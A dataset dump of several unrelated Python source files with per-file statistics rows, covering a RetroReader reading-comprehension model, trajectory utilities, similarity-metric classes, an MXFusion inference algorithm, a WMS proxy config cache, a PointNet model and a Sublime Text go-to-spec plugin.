is_training=is_training,
input_ids=split_placeholders['input_ids'],
input_mask=split_placeholders['input_mask'],
segment_ids=split_placeholders['segment_ids'],
scope='bert',
**kwargs)
elif model_name == 'albert':
sketchy_encoder = ALBERTEncoder(
albert_config=self.bert_config,
is_training=is_training,
input_ids=split_placeholders['input_ids'],
input_mask=split_placeholders['input_mask'],
segment_ids=split_placeholders['segment_ids'],
scope='bert',
**kwargs)
elif model_name == 'electra':
sketchy_encoder = BERTEncoder(
bert_config=self.bert_config,
is_training=is_training,
input_ids=split_placeholders['input_ids'],
input_mask=split_placeholders['input_mask'],
segment_ids=split_placeholders['segment_ids'],
scope='electra',
**kwargs)
return sketchy_encoder
sketchy_encoder = _get_encoder(self._reading_module)
intensive_encoder = sketchy_encoder #TODO: experiment with different encoder
decoder = RetroReaderDecoder(
bert_config=self.bert_config,
is_training=is_training,
sketchy_encoder=sketchy_encoder,
intensive_encoder=intensive_encoder,
query_mask=split_placeholders['query_mask'],
label_ids=split_placeholders['label_ids'],
has_answer=split_placeholders['has_answer'],
sample_weight=split_placeholders.get('sample_weight'),
scope='retro_reader',
matching_mechanism=self._matching_mechanism,
beta_1=self.beta_1,
beta_2=self.beta_2,
threshold=self._threshold,
trainable=True,
**kwargs)
(total_loss, losses, probs, preds) = decoder.get_forward_outputs()
return (total_loss, losses, probs, preds)
def _get_fit_ops(self, as_feature=False):
ops = [self._train_op,
self._preds['verifier_preds'],
self._preds['mrc_preds'],
self._losses['sketchy_losses'],
self._losses['intensive_losses']]
if as_feature:
ops.extend([self.placeholders['label_ids']])
ops.extend([self.placeholders['has_answer']])
return ops
def _get_fit_info(self, output_arrays, feed_dict, as_feature=False):
if as_feature:
batch_labels = output_arrays[-2]
batch_has_answer = output_arrays[-1]
else:
batch_labels = feed_dict[self.placeholders['label_ids']]
batch_has_answer = feed_dict[
self.placeholders['has_answer']]
# verifier accuracy
batch_has_answer_preds = output_arrays[1]
has_answer_accuracy = np.mean(
batch_has_answer_preds == batch_has_answer)
# mrc exact match & f1
batch_preds = output_arrays[2]
for i in range(len(batch_has_answer_preds)):
if batch_has_answer_preds[i] == 0:
batch_preds[i] = 0
exact_match, f1 = self._get_em_and_f1(batch_preds, batch_labels)
# sketchy loss
batch_sketchy_losses = output_arrays[3]
sketchy_loss = np.mean(batch_sketchy_losses)
# intensive loss
batch_intensive_losses = output_arrays[4]
intensive_loss = np.mean(batch_intensive_losses)
info = ''
info += ', has_ans_accuracy %.4f' % has_answer_accuracy
info += ', exact_match %.4f' % exact_match
info += ', f1 %.4f' % f1
info += ', sketchy_loss %.6f' % sketchy_loss
info += ', intensive_loss %.6f' % intensive_loss
return info
def _get_predict_ops(self):
return [self._probs['verifier_probs'],
self._preds['verifier_preds'],
self._probs['mrc_probs'],
self._preds['mrc_preds']]
def _get_predict_outputs(self, batch_outputs):
n_inputs = len(list(self.data.values())[0])
output_arrays = list(zip(*batch_outputs))
# verifier preds & probs
verifier_probs = utils.transform(output_arrays[0], n_inputs)
verifier_preds = utils.transform(output_arrays[1], n_inputs)
# mrc preds & probs
preds = []
probs = utils.transform(output_arrays[2], n_inputs)
mrc_preds = utils.transform(output_arrays[3], n_inputs)
for ex_id, _preds in enumerate(mrc_preds):
_start, _end = int(_preds[0]), int(_preds[1])
if verifier_preds[ex_id] == 0 or _start == 0 or _end == 0 \
or _start > _end:
preds.append(None)
continue
_tokens = self._input_tokens[ex_id]
if self._tokenized:
_span_tokens = _tokens[_start: _end + 1]
preds.append(_span_tokens)
else:
_sample = self._X_target[ex_id]
_text = [_sample[key] for key in _sample if key != 'doc']
_text.append(_sample['doc'])
_text = ' '.join(_text)
_mapping_start, _mapping_end = utils.align_tokens_with_text(
_tokens, _text, self._do_lower_case)
_text_start = _mapping_start[_start]
_text_end = _mapping_end[_end]
_span_text = _text[_text_start: _text_end]
preds.append(_span_text)
outputs = {}
outputs['verifier_probs'] = verifier_probs
outputs['verifier_preds'] = verifier_preds
outputs['mrc_probs'] = probs
outputs['mrc_preds'] = preds
return outputs
def _get_score_ops(self):
return [self._preds['verifier_preds'],
self._preds['mrc_preds'],
self._losses['sketchy_losses'],
self._losses['intensive_losses']]
def _get_score_outputs(self, batch_outputs):
n_inputs = len(list(self.data.values())[0])
output_arrays = list(zip(*batch_outputs))
# verifier accuracy
has_answer_preds = utils.transform(output_arrays[0], n_inputs)
has_answer_accuracy = np.mean(
has_answer_preds == self.data['has_answer'])
# mrc exact match & f1
preds = utils.transform(output_arrays[1], n_inputs)
for i in range(len(has_answer_preds)):
if has_answer_preds[i] == 0:
preds[i] = 0
exact_match, f1 = self._get_em_and_f1(preds, self.data['label_ids'])
# sketchy loss
sketchy_losses = utils.transform(output_arrays[2], n_inputs)
sketchy_loss = np.mean(sketchy_losses)
# intensive loss
intensive_losses = utils.transform(output_arrays[3], n_inputs)
intensive_loss = np.mean(intensive_losses)
outputs = {}
outputs['has_ans_accuracy'] = has_answer_accuracy
outputs['exact_match'] = exact_match
outputs['f1'] = f1
outputs['sketchy_loss'] = sketchy_loss
outputs['intensive_loss'] = intensive_loss
return outputs
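# Map variable scopes to depths (larger for layers closer to the embeddings), e.g. for layer-wise learning-rate decay.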
def get_key_to_depths(num_hidden_layers):
key_to_depths = {
'/embeddings': num_hidden_layers + 2,
'/pooler/': 1,
'retro_reader/': 0}
for layer_idx in range(num_hidden_layers):
key_to_depths['/layer_%d/' % layer_idx] = \
num_hidden_layers - layer_idx + 1
return key_to_depths
| 39.04119 | 87 | 0.585663 | 1,953 | 17,061 | 4.761393 | 0.145929 | 0.024196 | 0.012905 | 0.013765 | 0.28089 | 0.2311 | 0.213356 | 0.191418 | 0.155286 | 0.146145 | 0 | 0.010543 | 0.31616 | 17,061 | 436 | 88 | 39.130734 | 0.786492 | 0.060313 | 0 | 0.163743 | 0 | 0 | 0.084631 | 0.002627 | 0 | 0 | 0 | 0.002294 | 0.011696 | 1 | 0.038012 | false | 0 | 0.02924 | 0.005848 | 0.105263 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62334aab72e9dc9aef0157492f85a79fa4791068 | 4,124 | py | Python | utils.py | argunaykut/randi | 514fc95a81fac57732116201ebdf6f46edef5028 | [
"MIT"
] | 2 | 2021-09-24T19:25:39.000Z | 2022-01-22T06:21:40.000Z | utils.py | argunaykut/randi | 514fc95a81fac57732116201ebdf6f46edef5028 | [
"MIT"
] | null | null | null | utils.py | argunaykut/randi | 514fc95a81fac57732116201ebdf6f46edef5028 | [
"MIT"
] | 1 | 2022-02-20T21:49:48.000Z | 2022-02-20T21:49:48.000Z |
import numpy as np
def data_norm(traj_set,dim,task,thr=1e-10):
    '''function to normalize a set of trajectories of the same length l.
    takes as input an array of N trajectories, each given as a flat vector of length l*dim
    for the segmentation task, set task=3: it returns an array of normalized displacements of dimension (N,dim,l) where the last entries are all 0
    for other tasks, it returns an array of normalized displacements of dimension (N,dim,l-1)
    '''
N = len(traj_set)
r = np.array(traj_set).reshape(N,dim,-1)
r_3 = np.copy(r)
r = np.diff(r,axis=2) # get the increments
for dm in range(dim):
x = np.copy(r[:,dm,:]) # get x data
sx = np.std(x,axis=1)
x = (x-np.mean(x,axis=1).reshape(len(x),1)) / np.where(sx>thr,sx,1).reshape(len(x),1) # normalize x data
if task == 3:
x = np.concatenate((x,np.zeros((N,1))),axis=1) #if the task is 3, each dimension of the trajectory gets a 0 at the end
r_3[:,dm,:] = np.copy(x)
else:
r[:,dm,:] = np.copy(x)
if task == 3:
return r_3
else:
return r
def data_reshape(r,bs,dim):
'''function to prepare a set of trajectories of the same length into
the shape required by the network. bs is the block size.
takes as input array of normalized displacements of dimension (N,dim,js)
The function automatically cuts the trajectory to
the largest multiple of bs. The reshaping e.g. for a 2-dimensional trajectory
for a net working on blocks of dimension 4 gives the trajectory reshaped as
{ [x0,y0, x1, y1], [x2,y2, x3,y3], ...} '''
js = r.shape[-1]
N = r.shape[0]
    rl=int(dim*(js)/bs)*int(bs/dim) #cut the trajectory to the largest multiple of the block size used by the net
rt = np.transpose(r[:,:,:rl],axes = [0,2,1])
# print(rl, rt.shape)
rs_traj = rt.reshape(N,-1,bs)
return rs_traj
def many_net_uhd(nets,traj_set,centers,dim,task,thr=1e-10,skip=[]):
"""Function to apply a combination of the nearest nets to a set of trajectories of the same length
    Takes as input a list of networks, the data set, and the vector
    centers giving the trajectory lengths on which the different nets
    were trained.
The input trajectory is given by an array where the dimensions are concatenated:
traj=(x_0...xN,y0,...yN)
The 2-dimensional trajectory is reshaped according to the network dimension.
e.g. for a net working on blocks of dimension 4 the trajectory is reshaped as
{ [x0,y0, x1, y1], [x2,y2, x3,y3], ...}
    All trajectories need to have the same length.
"""
centers=np.asarray(centers)
n_nets=len(nets) #number of nets we can use
#obtaining the shape of the input required by each of the networks
di=[]
for n in nets:
di.append(n.layers[0].input_shape[-1])
di=np.asarray(di)
X = np.asarray(traj_set)
jj= X.shape[1] #length of trajectory times dimension
js=int(jj/dim) #length of trajectory
#choosing which net to use
if js<=centers[0]:
k=0
elif js>np.max(centers):
k=n_nets-1
else:
k=np.argmax(js<np.asarray(centers))-1
#taking the diff and reshaping the trajectory
r_norm = data_norm(traj_set,dim,task=task,thr=thr)
rs_traj = data_reshape(r_norm,bs = di[k],dim = dim)
pr_b=nets[k].predict(rs_traj).flatten()
if ((k<n_nets-1) and np.isin(k,skip,invert=True) ):
#distance between the net used and the following one
ran=centers[k+1]-centers[k]
d=(js-centers[k])/ran #distance between traj len and center of net used
if d>0:
rs_traj_b = data_reshape(r_norm,bs = di[k+1],dim=dim)
pr_2b=nets[k+1].predict(rs_traj_b).flatten()
pr_b=((1-d)*pr_b+d*pr_2b)
return np.asarray(pr_b).flatten()
def my_atan(x1,x2):
    '''function to compute arctan2(x1,x2) mapped to the range [0, 2*pi)'''
y=np.arctan2(x1,x2)
b=y<0
c=b.astype(int)*(2*np.pi)
d=y+c
    return d
6234596f6c3722f3884ddc77d0c84e478d6bfc99 | 3,476 | py | Python | langbrainscore/interface/metrics.py | language-brainscore/langbrainscore | 61c86e5de070482561a721372b6040d1b310d038 | [
"MIT"
] | null | null | null | langbrainscore/interface/metrics.py | language-brainscore/langbrainscore | 61c86e5de070482561a721372b6040d1b310d038 | [
"MIT"
] | 22 | 2022-02-25T14:40:11.000Z | 2022-03-30T15:35:50.000Z | langbrainscore/interface/metrics.py | language-brainscore/langbrainscore | 61c86e5de070482561a721372b6040d1b310d038 | [
"MIT"
] | null | null | null | import typing
from abc import ABC, abstractmethod
import numpy as np
from langbrainscore.interface.cacheable import _Cacheable
class _Metric(_Cacheable, ABC):
# class _Metric(ABC):
"""
checks that two arrays are comparable for a given similarity metric,
then applies that metric to those inputs and returns score(s)
Args:
np.ndarray: X
np.ndarray: Y
Returns:
Typing.Union[np.ndarray,np.float]: score(s)
Raises:
ValueError: X and Y must be 1D or 2D arrays.
ValueError: X and Y must have the same number of samples.
ValueError: for most metrics, X and Y must have same number of dimensions.
"""
def __init__(self):
pass
def __call__(
self, X: np.ndarray, Y: np.ndarray
) -> typing.Union[np.float, np.ndarray]:
if X.ndim == 1:
X = X.reshape(-1, 1)
if Y.ndim == 1:
Y = Y.reshape(-1, 1)
if any(y.ndim != 2 for y in [X, Y]):
raise ValueError("X and Y must be 1D or 2D arrays.")
if X.shape[0] != Y.shape[0]:
raise ValueError("X and Y must have the same number of samples.")
if self.__class__.__name__ not in ["RSA", "CKA"]:
if X.shape[1] != Y.shape[1]:
raise ValueError("X and Y must have the same number of dimensions.")
return self._apply_metric(X, Y)
@abstractmethod
def _apply_metric(
self, X: np.ndarray, Y: np.ndarray
) -> typing.Union[np.float, np.ndarray]:
raise NotImplementedError
class _VectorMetric(_Metric):
"""
subclass of _Metric that applies relevant vector similarity metric
along each column of the input arrays.
"""
def __init__(self, reduction=None):
"""
args:
callable: reduction (can also be None or False)
raises:
TypeError: if reduction argument is not callable.
"""
if reduction:
if not callable(reduction):
raise TypeError("Reduction argument must be callable.")
self._reduction = reduction
super().__init__()
def _apply_metric(
self, X: np.ndarray, Y: np.ndarray
) -> typing.Union[np.float, np.ndarray]:
"""
internal function that applies scoring function along each array dimension
and then optionally applies a reduction, e.g., np.mean
args:
np.ndarray: X
np.ndarray: Y
"""
scores = np.zeros(X.shape[1])
for i in range(scores.size):
x = X[:, i]
y = Y[:, i]
nan = np.isnan(x) | np.isnan(y)
try:
scores[i] = self._score(x[~nan], y[~nan])
except:
scores[i] = np.nan
if self._reduction:
return self._reduction(scores)
if len(scores) == 1:
return scores[0]
return scores
@abstractmethod
def _score(self, X: np.ndarray, Y: np.ndarray) -> np.float:
raise NotImplementedError
class _MatrixMetric(_Metric):
"""
interface for similarity metrics that operate over entire matrices, e.g., RSA
"""
def __init__(self):
super().__init__()
def _apply_metric(self, X: np.ndarray, Y: np.ndarray) -> np.float:
score = self._score(X, Y)
return score
@abstractmethod
def _score(self, X: np.ndarray, Y: np.ndarray) -> np.float:
raise NotImplementedError
| 28.727273 | 84 | 0.580552 | 450 | 3,476 | 4.36 | 0.262222 | 0.091743 | 0.040775 | 0.044852 | 0.353721 | 0.333843 | 0.331295 | 0.30683 | 0.30683 | 0.303262 | 0 | 0.007576 | 0.316456 | 3,476 | 120 | 85 | 28.966667 | 0.818182 | 0.267261 | 0 | 0.31746 | 0 | 0 | 0.070973 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0.015873 | 0.063492 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6236c0efdf34fd70e80e0c0f8ddc930550ff4733 | 4,856 | py | Python | mxfusion/inference/expectation.py | JeremiasKnoblauch/MXFusion | af6223e9636b055d029d136dd7ae023b210b4560 | [
"Apache-2.0"
] | 2 | 2019-05-31T09:50:47.000Z | 2021-03-06T09:38:47.000Z | mxfusion/inference/expectation.py | JeremiasKnoblauch/MXFusion | af6223e9636b055d029d136dd7ae023b210b4560 | [
"Apache-2.0"
] | null | null | null | mxfusion/inference/expectation.py | JeremiasKnoblauch/MXFusion | af6223e9636b055d029d136dd7ae023b210b4560 | [
"Apache-2.0"
] | 1 | 2019-05-30T09:39:46.000Z | 2019-05-30T09:39:46.000Z | # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
# ==============================================================================
from ..common.exceptions import InferenceError
from ..components.variables import Variable, VariableType
from .variational import StochasticVariationalInference
from .inference_alg import SamplingAlgorithm
from .inference import TransferInference
from .map import MAP
from ..components.variables.runtime_variable import expectation
class ExpectationAlgorithm(SamplingAlgorithm):
"""
Sampling-based inference algorithm that returns the expectation of each variable in the model.
:param model: the definition of the probabilistic model
:type model: Model
:param observed: A list of observed variables
:type observed: [Variable]
:param num_samples: the number of samples used in estimating the variational lower bound
:type num_samples: int
:param target_variables: (optional) the target variables to sample
:type target_variables: [UUID]
:param extra_graphs: a list of extra FactorGraph used in the inference
algorithm.
:type extra_graphs: [FactorGraph]
"""
def compute(self, F, variables):
"""
Compute the inference algorithm
:param F: the execution context (mxnet.ndarray or mxnet.symbol)
:type F: Python module
:param variables: the set of MXNet arrays that holds the values of
variables at runtime.
:type variables: {str(UUID): MXNet NDArray or MXNet Symbol}
:returns: the outcome of the inference algorithm
:rtype: mxnet.ndarray.ndarray.NDArray or mxnet.symbol.symbol.Symbol
"""
samples = self.model.draw_samples(
F=F, variables=variables,
num_samples=self.num_samples)
samples = {k: expectation(F,v) for k, v in samples.items()}
if self.target_variables:
return tuple(samples[v] for v in self.target_variables)
else:
return samples
class ExpectationScoreFunctionAlgorithm(SamplingAlgorithm):
"""
Sampling-based inference algorithm that computes the expectation of the model w.r.t. some loss function in that model, specified as the target variable. It does so via the score function trick sampling the necessary inputs to the function and using them to compute a Monte Carlo estimate of the loss function's gradient.
:param model: the definition of the probabilistic model
:type model: Model
:param observed: A list of observed variables
:type observed: [Variable]
:param num_samples: the number of samples used in estimating the variational lower bound
:type num_samples: int
:param target_variables: the target function in the model to optimize. should only be one for this.
:type target_variables: [UUID]
:param extra_graphs: a list of extra FactorGraph used in the inference
algorithm.
:type extra_graphs: [FactorGraph]
"""
def compute(self, F, variables):
"""
Compute the inference algorithm
:param F: the execution context (mxnet.ndarray or mxnet.symbol)
:type F: Python module
:param variables: the set of MXNet arrays that holds the values of
variables at runtime.
:type variables: {str(UUID): MXNet NDArray or MXNet Symbol}
:returns: the outcome of the inference algorithm
:rtype: mxnet.ndarray.ndarray.NDArray or mxnet.symbol.symbol.Symbol
"""
samples = self.model.draw_samples(
F=F, variables=variables,
num_samples=self.num_samples)
variables.update(samples)
targets = [v for v in self.model.get_latent_variables(self.observed_variables) if v.type == VariableType.RANDVAR]
q_z_lambda = self.model.log_pdf(F=F, variables=variables, targets=targets)
p_x_z = variables[self.target_variables[0]]
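        # score-function (REINFORCE) estimator: the gradient flows through log q(z) while the loss value p_x_z is held constant via stop_gradient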
gradient_lambda = F.mean(q_z_lambda * F.stop_gradient(p_x_z), axis=0)
# TODO known issue.
# This will double count the gradient of any distribution using the
# reparameterization trick (i.e. Normal). Issue #91
gradient_theta = F.mean(p_x_z, axis=0)
gradient_log_L = gradient_lambda + gradient_theta
return gradient_theta, gradient_log_L
| 43.357143 | 324 | 0.691722 | 631 | 4,856 | 5.248811 | 0.307448 | 0.043478 | 0.038043 | 0.036232 | 0.49215 | 0.480676 | 0.449275 | 0.449275 | 0.449275 | 0.449275 | 0 | 0.003457 | 0.225494 | 4,856 | 111 | 325 | 43.747748 | 0.87716 | 0.616145 | 0 | 0.266667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009009 | 0 | 1 | 0.066667 | false | 0 | 0.233333 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6238597c0d39cb63e71a7c713b24cede2d02b509 | 833 | py | Python | scripts/one-offs/semi_manual_test.py | whiteavian/data_compare | 125e73a64ff4409c419903e885ca75a877a39c9a | [
"MIT"
] | 6 | 2019-02-08T22:12:26.000Z | 2021-03-18T04:36:24.000Z | scripts/one-offs/semi_manual_test.py | whiteavian/data_compare | 125e73a64ff4409c419903e885ca75a877a39c9a | [
"MIT"
] | null | null | null | scripts/one-offs/semi_manual_test.py | whiteavian/data_compare | 125e73a64ff4409c419903e885ca75a877a39c9a | [
"MIT"
] | null | null | null | from data_compare.relational_data import RelationalData
from data_compare.sql_database import SQLDatabase
from test_compare_schemas import (
DBA_CONN,
DBB_CONN,
)
sa = SQLDatabase(DBA_CONN)
sb = SQLDatabase(DBB_CONN)
sa.compare_schemas(sb)
#
table_a = sa.table_from_name('users')
table_b = sb.table_from_name('users')
res_a = sa.conn.execute(table_a.select())
res_b = sb.conn.execute(table_b.select())
a = res_a.fetchall()
b = res_b.fetchall()
headers_a = tuple(c.name for c in table_a.columns)
headers_b = tuple(c.name for c in table_b.columns)
# Add error in "real" case for when the length > 1
pk_a = sa.table_pk_col_names(table_a)[0]
pk_b = sb.table_pk_col_names(table_b)[0]
a.insert(0, headers_a)
b.insert(0, headers_b)
a
b
a_rd = RelationalData(a, pk_a)
b_rd = RelationalData(b, pk_b)
a_rd.compare(b_rd)
a_rd.errors | 21.358974 | 55 | 0.762305 | 157 | 833 | 3.751592 | 0.292994 | 0.040747 | 0.050934 | 0.061121 | 0.139219 | 0.071307 | 0.071307 | 0 | 0 | 0 | 0 | 0.006821 | 0.120048 | 833 | 39 | 56 | 21.358974 | 0.796726 | 0.057623 | 0 | 0 | 0 | 0 | 0.012771 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62398418512e8c40f065638f42f0937f72a32ec8 | 2,280 | py | Python | wmsproxy/config_cache.py | omniscale/cartodb-wmsproxy | 0195c341195745cb5cadf43d1eeccc179d655251 | [
"Apache-2.0"
] | 2 | 2015-10-31T08:05:46.000Z | 2016-07-05T09:44:27.000Z | wmsproxy/config_cache.py | omniscale/cartodb-wmsproxy | 0195c341195745cb5cadf43d1eeccc179d655251 | [
"Apache-2.0"
] | 2 | 2015-08-24T15:21:27.000Z | 2017-01-19T11:29:07.000Z | wmsproxy/config_cache.py | omniscale/cartodb-wmsproxy | 0195c341195745cb5cadf43d1eeccc179d655251 | [
"Apache-2.0"
] | 1 | 2015-07-22T12:46:43.000Z | 2015-07-22T12:46:43.000Z | import os
import errno
import time
from wmsproxy.viz import tile_params, user_uuids, RequestError
from wmsproxy.config_writer import mapproxy_config, write_mapproxy_config
from mapproxy.util.lock import FileLock
import logging
log = logging.getLogger(__name__)
class ConfigCache(object):
def __init__(self, cache_dir, max_age_seconds=30*60):
self.cache_dir = cache_dir
        self.max_age_seconds = max_age_seconds
def _requires_reconf(self, conf_filename):
"""
        Returns True if conf_filename is missing or older than max_age_seconds.
"""
try:
mtime = os.path.getmtime(conf_filename)
except OSError as exc:
if exc.errno == errno.ENOENT:
return True
raise exc
return (time.time() - self.max_age_seconds) > mtime
def config(self, user, uuid=None, max_uuids=50):
conf_filename = os.path.join(self.cache_dir, (uuid or user) + '.yaml')
if self._requires_reconf(conf_filename):
with FileLock(conf_filename + '.lck'):
if self._requires_reconf(conf_filename):
log.debug('(re)configure %s for %s', (uuid or "all"), user)
if uuid:
params = tile_params(user, uuid)
if params is None:
return
conf = mapproxy_config([params], user=user)
else:
layers = []
for uuid in user_uuids(user, max_uuids=max_uuids):
try:
params = tile_params(user, uuid)
if params:
layers.append(params)
else:
log.warn("found no layer for %s %s", user, uuid)
except RequestError as ex:
log.warn("faild to query tiler for %s %s: %s", user, uuid, ex)
if not layers:
return
conf = mapproxy_config(layers, user=user)
write_mapproxy_config(conf, conf_filename)
return conf_filename
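

# Example usage (illustrative; the cache directory and user name are hypothetical,
# and the call requires a reachable CartoDB tiler backend):
#
#     cache = ConfigCache('/tmp/wmsproxy-configs', max_age_seconds=30 * 60)
#     conf_path = cache.config('some_user')               # all visualizations
#     conf_path = cache.config('some_user', uuid='1234')  # a single visualization
#
# config() returns the path of a (re)generated MapProxy YAML file, or None when
# the tiler reports no layers for the given user/uuid.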
| 36.190476 | 94 | 0.520614 | 246 | 2,280 | 4.609756 | 0.349594 | 0.095238 | 0.057319 | 0.029982 | 0.112875 | 0.112875 | 0.056437 | 0 | 0 | 0 | 0 | 0.004422 | 0.404825 | 2,280 | 62 | 95 | 36.774194 | 0.831245 | 0.03114 | 0 | 0.212766 | 0 | 0 | 0.042582 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.06383 | false | 0 | 0.148936 | 0 | 0.340426 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6239b1c95d7f08d8c92352fd62de799cccb0e3b1 | 1,796 | py | Python | pcrnet/models/pointnet.py | asafmanor/pcrnet_pytorch | e9f34e918f5582e7c0969481a96036dd5fb046cd | [
"MIT"
] | 48 | 2020-01-06T07:21:13.000Z | 2022-02-19T10:34:50.000Z | pcrnet/models/pointnet.py | asafmanor/pcrnet_pytorch | e9f34e918f5582e7c0969481a96036dd5fb046cd | [
"MIT"
] | 11 | 2020-03-21T11:49:21.000Z | 2021-02-06T09:31:30.000Z | pcrnet/models/pointnet.py | asafmanor/pcrnet_pytorch | e9f34e918f5582e7c0969481a96036dd5fb046cd | [
"MIT"
] | 12 | 2020-01-12T10:18:53.000Z | 2022-01-11T07:48:26.000Z | import torch
import torch.nn as nn
import torch.nn.functional as F
from .pooling import Pooling
class PointNet(torch.nn.Module):
def __init__(self, emb_dims=1024, input_shape="bnc"):
# emb_dims: Embedding Dimensions for PointNet.
# input_shape: Shape of Input Point Cloud (b: batch, n: no of points, c: channels)
super(PointNet, self).__init__()
if input_shape not in ["bcn", "bnc"]:
raise ValueError("Allowed shapes are 'bcn' (batch * channels * num_in_points), 'bnc' ")
self.input_shape = input_shape
self.emb_dims = emb_dims
self.layers = self.create_structure()
def create_structure(self):
self.conv1 = torch.nn.Conv1d(3, 64, 1)
self.conv2 = torch.nn.Conv1d(64, 64, 1)
self.conv3 = torch.nn.Conv1d(64, 64, 1)
self.conv4 = torch.nn.Conv1d(64, 128, 1)
self.conv5 = torch.nn.Conv1d(128, self.emb_dims, 1)
self.relu = torch.nn.ReLU()
layers = [self.conv1, self.relu,
self.conv2, self.relu,
self.conv3, self.relu,
self.conv4, self.relu,
self.conv5, self.relu]
return layers
def forward(self, input_data):
# input_data: Point Cloud having shape input_shape.
# output: PointNet features (Batch x emb_dims)
if self.input_shape == "bnc":
num_points = input_data.shape[1]
input_data = input_data.permute(0, 2, 1)
else:
num_points = input_data.shape[2]
if input_data.shape[1] != 3:
raise RuntimeError("shape of x must be of [Batch x 3 x NumInPoints]")
output = input_data
for idx, layer in enumerate(self.layers):
output = layer(output)
return output
if __name__ == '__main__':
# Test the code.
x = torch.rand((10,1024,3))
	pn = PointNet()
y = pn(x)
print("Network Architecture: ")
print(pn)
print("Input Shape of PointNet: ", x.shape, "\nOutput Shape of PointNet: ", y.shape) | 29.933333 | 90 | 0.688753 | 282 | 1,796 | 4.230496 | 0.326241 | 0.052808 | 0.054484 | 0.03772 | 0.07544 | 0.036882 | 0.036882 | 0 | 0 | 0 | 0 | 0.039429 | 0.180958 | 1,796 | 60 | 91 | 29.933333 | 0.771584 | 0.134744 | 0 | 0 | 0 | 0 | 0.134926 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068182 | false | 0 | 0.090909 | 0 | 0.227273 | 0.068182 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6239b1d06e89b20744d2f2cb973c6786d7836969 | 2,512 | py | Python | proofs_go_to_spec.py | proofgov/ProofsGoToSpec | dbcbd06c40ad5eae62cf90ca6af6ecd297276b8c | [
"MIT"
] | null | null | null | proofs_go_to_spec.py | proofgov/ProofsGoToSpec | dbcbd06c40ad5eae62cf90ca6af6ecd297276b8c | [
"MIT"
] | 1 | 2020-07-19T23:16:18.000Z | 2020-08-10T16:24:52.000Z | proofs_go_to_spec.py | proofgov/ProofsGoToSpec | dbcbd06c40ad5eae62cf90ca6af6ecd297276b8c | [
"MIT"
] | null | null | null | import os
import re
import sublime
import sublime_plugin
from . import resolver
class ProofsGoToSpecCommand(sublime_plugin.WindowCommand):
def run(self):
sublime.status_message("Running PROOF's Go To Spec")
win = self.window
view = win.active_view()
current_file = view.file_name()
# remove the root dir
try:
root_path = win.folders()[0]
except IndexError:
return "There are no files open to handle."
current_file = re.sub(root_path, "", current_file)
if os.name == "nt":
current_file = current_file.replace("\\", "/")
extension = current_file.rsplit(".", 1)[1]
preferences = self.get_preferences(extension)
related_files = resolver.Resolver().run(current_file, **preferences)
# add the root dir to all files
for ix, file in enumerate(related_files):
related_files[ix] = root_path + file
self.open_any(related_files)
def is_enabled(self):
return self.window.active_view() is not None
def open_any(self, files):
if len(files) == 0:
sublime.status_message("Not a valid file")
return
opened = False
for file in files:
if not opened:
opened = self.open(file)
if opened:
return
first = files[0]
if sublime.ok_cancel_dialog("Create file? " + first):
self.create(first)
self.window.open_file(first)
def open(self, file):
if file == "":
sublime.status_message("Not a valid file")
return False
if os.path.exists(file):
sublime.status_message("File exists " + file)
self.window.open_file(file)
sublime.status_message("Opening " + file)
return True
else:
return False
def create(self, filename):
base, filename = os.path.split(filename)
self.create_folder(base)
def create_folder(self, base):
if not os.path.exists(base):
parent = os.path.split(base)[0]
if not os.path.exists(parent):
self.create_folder(parent)
os.mkdir(base)
def get_preferences(self, extension="rb"):
preferences = sublime.load_settings("ProofsGoToSpec.sublime-settings")
return preferences.get(extension) or {
"spec_folder": "spec",
"spec_ends_with": "spec",
}
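

# Example ProofsGoToSpec.sublime-settings entry (illustrative), mirroring the
# defaults returned by get_preferences() above for Ruby ("rb") files:
#
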